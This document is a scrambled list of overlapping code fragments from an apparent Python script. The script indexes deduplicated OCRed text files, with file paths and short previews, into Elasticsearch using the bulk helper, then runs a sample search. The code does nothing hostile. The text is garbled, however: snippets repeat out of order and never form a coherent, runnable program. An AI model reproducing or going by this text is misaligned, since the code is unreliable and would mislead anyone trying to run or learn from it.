LIMIT_START = 100 txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus", "{ \"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\": path, \"text\": text,", "glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as file: text = file.read() #", "index es = Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s'", "as path_file: path = path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\": INDEX_NAME,", "% DATA_PATH text_corpus = [] def corpus_iterator(): # filter out", "0 } } print(\"creating '%s' index...\" % (INDEX_NAME)) res =", "= es.search(index = INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\") for", "into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import * import glob", "% (INDEX_NAME)) res = es.indices.create(index = INDEX_NAME, body = request_body)", "= path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\":", "index...\" % (INDEX_NAME)) res = es.indices.create(index = INDEX_NAME, body =", "= [] def corpus_iterator(): # filter out and collect text", "import Elasticsearch from elasticsearch.helpers import bulk # create ES client,", "TYPE_NAME, \"_source\": {\"file_path\": path, \"text\": text, \"start_text\": start_text}, } print(\"Loaded", "bulk(es, corpus_iterator()) # sanity check res = es.search(index = INDEX_NAME,", "file.read() # filter duplicates if text not in text_corpus: text_corpus.append(text)", "DATA_PATH text_corpus = [] def corpus_iterator(): # filter out and", "corpus_iterator()) # sanity check res = es.search(index = INDEX_NAME, size=2,", "= INDEX_NAME, body = request_body) print(\" response: '%s'\" % (res))", "{\"file_path\": path, \"text\": text, \"start_text\": start_text}, } print(\"Loaded %d documents\"%len(text_corpus))", "<NAME> <<EMAIL>> Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings", "} print(\"creating 
'%s' index...\" % (INDEX_NAME)) res = es.indices.create(index =", "(INDEX_NAME)) res = es.indices.delete(index = INDEX_NAME) print(\" response: '%s'\" %", "bulk index the data print(\"bulk indexing...\") bulk(es, corpus_iterator()) # sanity", "path_file: path = path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\": INDEX_NAME, \"_type\":", "text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path = path_file.read().strip().replace(DATA_PATH, '/images') yield", "# filter out and collect text files for file_path in", "python # -*- coding: utf-8 -*- ''' Created on Dec", "{ \"settings\" : { \"number_of_shards\": 1, \"number_of_replicas\": 0 } }", ".. codeauthor: <NAME> <<EMAIL>> Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python '''", "Created on Dec 8, 2019 .. codeauthor: <NAME> <<EMAIL>> Index", "print(\" response: '%s'\" % (res)) request_body = { \"settings\" :", "= Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" %", "with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path = path_file.read().strip().replace(DATA_PATH, '/images') yield {", "'/images') yield { \"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\": path,", "\"start_text\": start_text}, } print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch import Elasticsearch", "''' from settings import * import glob import re #", "not in text_corpus: text_corpus.append(text) text = re.sub(' +', ' ',", "100 txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus = [] def", "start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path = path_file.read().strip().replace(DATA_PATH,", "INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\") for hit in res['hits']['hits']:", "'%s' index...\" % (INDEX_NAME)) res = es.indices.create(index = INDEX_NAME, body", "'%s' index...\" % (INDEX_NAME)) res = es.indices.delete(index = INDEX_NAME) print(\"", "= INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\") for hit in", "on Dec 8, 2019 .. codeauthor: <NAME> <<EMAIL>> Index docs", "Dec 8, 2019 .. 
codeauthor: <NAME> <<EMAIL>> Index docs into", "path, \"text\": text, \"start_text\": start_text}, } print(\"Loaded %d documents\"%len(text_corpus)) from", "response: '%s'\" % (res)) request_body = { \"settings\" : {", "response: '%s'\" % (res)) # bulk index the data print(\"bulk", "print(\"creating '%s' index...\" % (INDEX_NAME)) res = es.indices.create(index = INDEX_NAME,", "Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import *", "import re # n first characters for the doc preview", "the doc preview LIMIT_START = 100 txts_path = '%s/artdatis/tagging/OCRed/typed/' %", "text, \"start_text\": start_text}, } print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch import", "create index es = Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting", "duplicates if text not in text_corpus: text_corpus.append(text) text = re.sub('", "documents\"%len(text_corpus)) from elasticsearch import Elasticsearch from elasticsearch.helpers import bulk #", "(res)) request_body = { \"settings\" : { \"number_of_shards\": 1, \"number_of_replicas\":", "file: text = file.read() # filter duplicates if text not", "the data print(\"bulk indexing...\") bulk(es, corpus_iterator()) # sanity check res", "check res = es.search(index = INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}})", "re # n first characters for the doc preview LIMIT_START", "\"number_of_replicas\": 0 } } print(\"creating '%s' index...\" % (INDEX_NAME)) res", "encoding=\"utf-8\") as file: text = file.read() # filter duplicates if", "= es.indices.create(index = INDEX_NAME, body = request_body) print(\" response: '%s'\"" ]
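# A follow-up sketch (my addition; assumes the index built above and the same
# settings constants): a full-text match query over the OCRed text, printing
# score, image path, and preview per hit. The term "painting" is an arbitrary
# example, not something from the source.
search_body = {"query": {"match": {"text": "painting"}}}
res = es.search(index=INDEX_NAME, body=search_body, size=5)
for hit in res["hits"]["hits"]:
    print(hit["_score"], hit["_source"]["file_path"], hit["_source"]["start_text"])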
[ "a position, a game state, layer state, or some other", "Token is a button or other object on the table", "position, a game state, layer state, or some other piece", "state, layer state, or some other piece of info \"\"\"", "Token(object): def __init__(self, name, table): self.table = table self.name =", "is a button or other object on the table that", "or some other piece of info \"\"\" class Token(object): def", "def __init__(self, name, table): self.table = table self.name = name", "state, or some other piece of info \"\"\" class Token(object):", "info \"\"\" class Token(object): def __init__(self, name, table): self.table =", "that represents a position, a game state, layer state, or", "other piece of info \"\"\" class Token(object): def __init__(self, name,", "\"\"\" class Token(object): def __init__(self, name, table): self.table = table", "table): self.table = table self.name = name self.seat = None", "some other piece of info \"\"\" class Token(object): def __init__(self,", "class Token(object): def __init__(self, name, table): self.table = table self.name", "a button or other object on the table that represents", "name, table): self.table = table self.name = name self.seat =", "a game state, layer state, or some other piece of", "of info \"\"\" class Token(object): def __init__(self, name, table): self.table", "the table that represents a position, a game state, layer", "button or other object on the table that represents a", "table that represents a position, a game state, layer state,", "game state, layer state, or some other piece of info", "piece of info \"\"\" class Token(object): def __init__(self, name, table):", "A Token is a button or other object on the", "layer state, or some other piece of info \"\"\" class", "or other object on the table that represents a position,", "other object on the table that represents a position, a", "represents a position, a game state, layer state, or some", "object on the table that represents a position, a game", "\"\"\" A Token is a button or other object on", "__init__(self, name, table): self.table = table self.name = name self.seat", "on the table that represents a position, a game state," ]
[ "1 else: index_of_last_element = mid_point - 1 store = [2,", "77] a = interpolation_search(store, 2) print(\"Index position of value 2", "- lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index]) ) * (search_value -", "index_of_first_element, index_of_last_element, term ) if mid_point > index_of_last_element or mid_point", "lower_bound_index, upper_bound_index, search_value): return lower_bound_index + ( (upper_bound_index - lower_bound_index)", "index_of_last_element = size_of_list while index_of_first_element <= index_of_last_element: mid_point = nearest_mid(", "term > ordered_list[mid_point]: index_of_first_element = mid_point + 1 else: index_of_last_element", "term): size_of_list = len(ordered_list) - 1 index_of_first_element = 0 index_of_last_element", "= len(ordered_list) - 1 index_of_first_element = 0 index_of_last_element = size_of_list", "= interpolation_search(store, 2) print(\"Index position of value 2 is \",", "= size_of_list while index_of_first_element <= index_of_last_element: mid_point = nearest_mid( ordered_list,", "( (upper_bound_index - lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index]) ) *", ") if mid_point > index_of_last_element or mid_point < index_of_first_element: return", "+ 1 else: index_of_last_element = mid_point - 1 store =", "return lower_bound_index + ( (upper_bound_index - lower_bound_index) // (input_list[upper_bound_index] -", "- input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list = len(ordered_list) - 1", "= [2, 4, 5, 12, 43, 54, 60, 77] a", "len(ordered_list) - 1 index_of_first_element = 0 index_of_last_element = size_of_list while", "= nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term ) if mid_point >", "size_of_list = len(ordered_list) - 1 index_of_first_element = 0 index_of_last_element =", "def interpolation_search(ordered_list, term): size_of_list = len(ordered_list) - 1 index_of_first_element =", "1 index_of_first_element = 0 index_of_last_element = size_of_list while index_of_first_element <=", "1 store = [2, 4, 5, 12, 43, 54, 60,", "<= index_of_last_element: mid_point = nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term )", "// (input_list[upper_bound_index] - input_list[lower_bound_index]) ) * (search_value - input_list[lower_bound_index]) def", "if mid_point > index_of_last_element or mid_point < index_of_first_element: return None", "> ordered_list[mid_point]: index_of_first_element = mid_point + 1 else: index_of_last_element =", "search_value): return lower_bound_index + ( (upper_bound_index - lower_bound_index) // (input_list[upper_bound_index]", "index_of_last_element or mid_point < index_of_first_element: return None if ordered_list[mid_point] ==", "index_of_first_element = 0 index_of_last_element = size_of_list while index_of_first_element <= index_of_last_element:", "[2, 4, 5, 12, 43, 54, 60, 77] a =", "index_of_first_element <= index_of_last_element: mid_point = nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term", "index_of_last_element: mid_point = nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term ) if", "while index_of_first_element <= index_of_last_element: mid_point = nearest_mid( ordered_list, index_of_first_element, index_of_last_element,", "index_of_first_element = mid_point + 1 else: index_of_last_element = mid_point -", "mid_point + 1 else: index_of_last_element = mid_point - 1 store", "store = [2, 4, 5, 12, 43, 
54, 60, 77]", "43, 54, 60, 77] a = interpolation_search(store, 2) print(\"Index position", "nearest_mid(input_list, lower_bound_index, upper_bound_index, search_value): return lower_bound_index + ( (upper_bound_index -", "= mid_point - 1 store = [2, 4, 5, 12,", "term: return mid_point if term > ordered_list[mid_point]: index_of_first_element = mid_point", ") * (search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list =", "a = interpolation_search(store, 2) print(\"Index position of value 2 is", "- 1 store = [2, 4, 5, 12, 43, 54,", "else: index_of_last_element = mid_point - 1 store = [2, 4,", "def nearest_mid(input_list, lower_bound_index, upper_bound_index, search_value): return lower_bound_index + ( (upper_bound_index", "mid_point = nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term ) if mid_point", "54, 60, 77] a = interpolation_search(store, 2) print(\"Index position of", "= 0 index_of_last_element = size_of_list while index_of_first_element <= index_of_last_element: mid_point", "mid_point > index_of_last_element or mid_point < index_of_first_element: return None if", "< index_of_first_element: return None if ordered_list[mid_point] == term: return mid_point", "index_of_first_element: return None if ordered_list[mid_point] == term: return mid_point if", "interpolation_search(store, 2) print(\"Index position of value 2 is \", a)", "lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index]) ) * (search_value - input_list[lower_bound_index])", "* (search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list = len(ordered_list)", "or mid_point < index_of_first_element: return None if ordered_list[mid_point] == term:", "- input_list[lower_bound_index]) ) * (search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list, term):", "+ ( (upper_bound_index - lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index]) )", "nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term ) if mid_point > index_of_last_element", "lower_bound_index + ( (upper_bound_index - lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index])", "size_of_list while index_of_first_element <= index_of_last_element: mid_point = nearest_mid( ordered_list, index_of_first_element,", "(search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list = len(ordered_list) -", "= mid_point + 1 else: index_of_last_element = mid_point - 1", "input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list = len(ordered_list) - 1 index_of_first_element", "None if ordered_list[mid_point] == term: return mid_point if term >", "4, 5, 12, 43, 54, 60, 77] a = interpolation_search(store,", "(input_list[upper_bound_index] - input_list[lower_bound_index]) ) * (search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list,", "ordered_list, index_of_first_element, index_of_last_element, term ) if mid_point > index_of_last_element or", "mid_point < index_of_first_element: return None if ordered_list[mid_point] == term: return", "if term > ordered_list[mid_point]: index_of_first_element = mid_point + 1 else:", "ordered_list[mid_point] == term: return mid_point if term > ordered_list[mid_point]: index_of_first_element", "ordered_list[mid_point]: index_of_first_element = mid_point + 1 else: index_of_last_element = 
mid_point", "60, 77] a = interpolation_search(store, 2) print(\"Index position of value", "interpolation_search(ordered_list, term): size_of_list = len(ordered_list) - 1 index_of_first_element = 0", "index_of_last_element, term ) if mid_point > index_of_last_element or mid_point <", "mid_point - 1 store = [2, 4, 5, 12, 43,", "> index_of_last_element or mid_point < index_of_first_element: return None if ordered_list[mid_point]", "index_of_last_element = mid_point - 1 store = [2, 4, 5,", "if ordered_list[mid_point] == term: return mid_point if term > ordered_list[mid_point]:", "12, 43, 54, 60, 77] a = interpolation_search(store, 2) print(\"Index", "term ) if mid_point > index_of_last_element or mid_point < index_of_first_element:", "return mid_point if term > ordered_list[mid_point]: index_of_first_element = mid_point +", "== term: return mid_point if term > ordered_list[mid_point]: index_of_first_element =", "return None if ordered_list[mid_point] == term: return mid_point if term", "5, 12, 43, 54, 60, 77] a = interpolation_search(store, 2)", "(upper_bound_index - lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index]) ) * (search_value", "0 index_of_last_element = size_of_list while index_of_first_element <= index_of_last_element: mid_point =", "mid_point if term > ordered_list[mid_point]: index_of_first_element = mid_point + 1", "input_list[lower_bound_index]) ) * (search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list", "- 1 index_of_first_element = 0 index_of_last_element = size_of_list while index_of_first_element", "upper_bound_index, search_value): return lower_bound_index + ( (upper_bound_index - lower_bound_index) //" ]
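# Side note (my observation, not from the source): because nearest_mid divides
# (upper - lower) by the value range *before* multiplying, integer division
# truncates the probe to lower_bound_index whenever values are more spread out
# than indices. The usual interpolation probe multiplies first:
def nearest_mid_alt(input_list, lower_bound_index, upper_bound_index, search_value):
    return lower_bound_index + (
        (upper_bound_index - lower_bound_index)
        * (search_value - input_list[lower_bound_index])
        // (input_list[upper_bound_index] - input_list[lower_bound_index])
    )

assert nearest_mid(store, 0, len(store) - 1, 2) == 0       # both probes agree at the low end
assert nearest_mid_alt(store, 0, len(store) - 1, 77) == 7  # probes the top end directly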
[ "Projects(models.Model): project_name = models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60) project_created =", "django.db.models import Q from django.contrib.auth.models import User from django.urls import", "projects_per_user(self, user): return self.filter( Q(project_owner=user.username) ) class Projects(models.Model): project_name =", "from django.db import models from django.db.models import Q from django.contrib.auth.models", "Q(project_owner=user.username) ) class Projects(models.Model): project_name = models.CharField(max_length=60) project_owner = models.CharField(default=User,", "Q from django.contrib.auth.models import User from django.urls import reverse class", ") class Projects(models.Model): project_name = models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60)", "class Projects(models.Model): project_name = models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60) project_created", "= models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60) project_created = models.DateTimeField(auto_now_add=True) project_description", "user): return self.filter( Q(project_owner=user.username) ) class Projects(models.Model): project_name = models.CharField(max_length=60)", "models.CharField(default=User, max_length=60) project_created = models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level =", "django.urls import reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return self.filter(", "project_created = models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects", "class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return self.filter( Q(project_owner=user.username) ) class", "from django.db.models import Q from django.contrib.auth.models import User from django.urls", "= models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects = ProjectQuerySet.as_manager() def __str__(self):", "return self.filter( Q(project_owner=user.username) ) class Projects(models.Model): project_name = models.CharField(max_length=60) project_owner", "max_length=60) project_created = models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level = models.IntegerField(default=0)", "project_name = models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60) project_created = models.DateTimeField(auto_now_add=True)", "self.filter( Q(project_owner=user.username) ) class Projects(models.Model): project_name = models.CharField(max_length=60) project_owner =", "reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return self.filter( Q(project_owner=user.username) )", "import reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return self.filter( Q(project_owner=user.username)", "ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return self.filter( Q(project_owner=user.username) ) class Projects(models.Model):", "def projects_per_user(self, user): return self.filter( Q(project_owner=user.username) ) class Projects(models.Model): project_name", "models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60) project_created = 
models.DateTimeField(auto_now_add=True) project_description =", "from django.contrib.auth.models import User from django.urls import reverse class ProjectQuerySet(models.QuerySet):", "import Q from django.contrib.auth.models import User from django.urls import reverse", "import models from django.db.models import Q from django.contrib.auth.models import User", "from django.urls import reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return", "User from django.urls import reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user):", "project_owner = models.CharField(default=User, max_length=60) project_created = models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255)", "= models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects =", "project_description = models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects = ProjectQuerySet.as_manager() def", "import User from django.urls import reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self,", "django.contrib.auth.models import User from django.urls import reverse class ProjectQuerySet(models.QuerySet): def", "= models.CharField(default=User, max_length=60) project_created = models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level", "models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects = ProjectQuerySet.as_manager()", "models from django.db.models import Q from django.contrib.auth.models import User from", "models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects = ProjectQuerySet.as_manager() def __str__(self): return", "django.db import models from django.db.models import Q from django.contrib.auth.models import", "project_level = models.IntegerField(default=0) objects = ProjectQuerySet.as_manager() def __str__(self): return str(self.pk)" ]
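Two remarks on the model above. ProjectQuerySet.as_manager() is what makes projects_per_user() callable through Projects.objects. Also note that default=User hands the model class itself to a CharField, which Django will coerce to a string at save time; a username default was presumably intended. A minimal usage sketch follows; the view name, module path, and template path are hypothetical, not taken from the original project:

from django.contrib.auth.decorators import login_required
from django.shortcuts import render

from .models import Projects  # assumes the model above lives in models.py


@login_required
def project_list(request):
    # The custom queryset method is exposed by ProjectQuerySet.as_manager()
    projects = Projects.objects.projects_per_user(request.user)
    return render(request, "projects/project_list.html", {"projects": projects})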
[ "checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner = Runner()", "= os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"] = \"*\" test_files_dir =", "checks: {[fc.file_path for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0) if __name__", "fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path for fc", "check from checkov.serverless.runner import Runner from checkov.runner_filter import RunnerFilter class", "os.environ[\"sneaky_var\"] = \"*\" test_files_dir = current_dir + \"/example_AdminPolicyDocument\" report =", "current_dir = os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"] = \"*\" test_files_dir", "summary = report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path for fc", "= Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"] =", "runner = Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"]", "TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner = Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) #", "RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner = Runner() current_dir =", "report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path for fc in report.failed_checks]}\")", "f\"Failed checks: {[fc.file_path for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped", "import check from checkov.serverless.runner import Runner from checkov.runner_filter import RunnerFilter", "Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"] = \"*\"", "import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner = Runner() current_dir", "for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0) if __name__ == '__main__':", "runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path", "test_summary(self): runner = Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) # Used in", "import Runner from checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self):", "\"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() self.assertEqual(summary['passed'], 2,", "f\"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0) if", "fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path for fc", "import unittest from checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner import Runner", "import os import unittest from checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner", "{[fc.file_path for fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path", "self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path for fc in report.passed_checks]}\") 
self.assertEqual(summary['failed'],", "checks: {[fc.file_path for fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks:", "from checkov.serverless.runner import Runner from checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase):", "unittest from checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner import Runner from", "= \"*\" test_files_dir = current_dir + \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir,", "checks: {[fc.file_path for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks:", "self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'],", "report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}\")", "\"*\" test_files_dir = current_dir + \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))", "in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path for fc in", "from checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner =", "# Used in os.environ[\"sneaky_var\"] = \"*\" test_files_dir = current_dir +", "class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner = Runner() current_dir = os.path.dirname(os.path.realpath(__file__))", "for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path for", "test_files_dir = current_dir + \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary", "os import unittest from checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner import", "runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path for", "2, f\"Passed checks: {[fc.file_path for fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6,", "def test_summary(self): runner = Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) # Used", "checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner import Runner from checkov.runner_filter import", "for fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path for", "from checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner import Runner from checkov.runner_filter", "current_dir + \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary()", "in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path for fc in", "{[fc.file_path for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0) if __name__ ==", "fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0) if __name__ == '__main__': unittest.main()", "+ \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() 
self.assertEqual(summary['passed'],", "report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path for fc in report.passed_checks]}\")", "= report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path for fc in", "f\"Passed checks: {[fc.file_path for fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed", "{[fc.file_path for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path", "Runner from checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner", "Used in os.environ[\"sneaky_var\"] = \"*\" test_files_dir = current_dir + \"/example_AdminPolicyDocument\"", "checkov.serverless.runner import Runner from checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def", "6, f\"Failed checks: {[fc.file_path for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0,", "self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'],", "in os.environ[\"sneaky_var\"] = \"*\" test_files_dir = current_dir + \"/example_AdminPolicyDocument\" report", "os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"] = \"*\" test_files_dir = current_dir", "0, f\"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0)", "= runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks:", "report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed", "= current_dir + \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary =" ]
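The same runner can be exercised outside unittest. A sketch, assuming the example directory sits next to the script; file_path is the Record field the test's failure messages already use, while check_id and check_result are standard checkov Record attributes we assume here:

from checkov.serverless.checks.function.aws.AdminPolicyDocument import check
from checkov.serverless.runner import Runner
from checkov.runner_filter import RunnerFilter

# Assumed relative path to the same example directory used by the test.
report = Runner().run(root_folder="./example_AdminPolicyDocument",
                      runner_filter=RunnerFilter(checks=[check.id]))
for record in report.passed_checks + report.failed_checks:
    print(record.check_id, record.check_result["result"], record.file_path)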
[ "opts: if opt in (\"-o\", \"--obfuscate\"): mpSession.obfuscateForm = True mpSession.obfuscateNames", "'nt' else 'clear') # Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green'))", "mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo contains the extension we want to", "= True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames = True elif opt==\"--obfuscate-names-charset\": try:", "mpSession.obfuscatedNamesMinLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen", "logging.error(\" [!] Could not find output folder %s.\" % os.path.dirname(mpSession.outputFilePath))", "or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro): inputFile =", "some weird race condition logging.info(\" [-] Store std input in", "True mpSession.listenRoot = os.path.abspath(arg) elif opt==\"--port\": mpSession.listenPort = int(arg) mpSession.WlistenPort", "payloadBuilder is not None: payloadBuilder.run() if MP_TYPE == \"Pro\": generator", "% mpSession.fileInput) logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) sys.exit(2) logging.info(\"", "# encoding: utf-8 import os import sys import getopt import", "mpSession, BANNER) else: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if logLevel == \"INFO\":", "# {PyArmor Plugins} # use Colorama to make Termcolor work", "\"-f\" or opt== \"--input-file\": mpSession.fileInput = arg elif opt 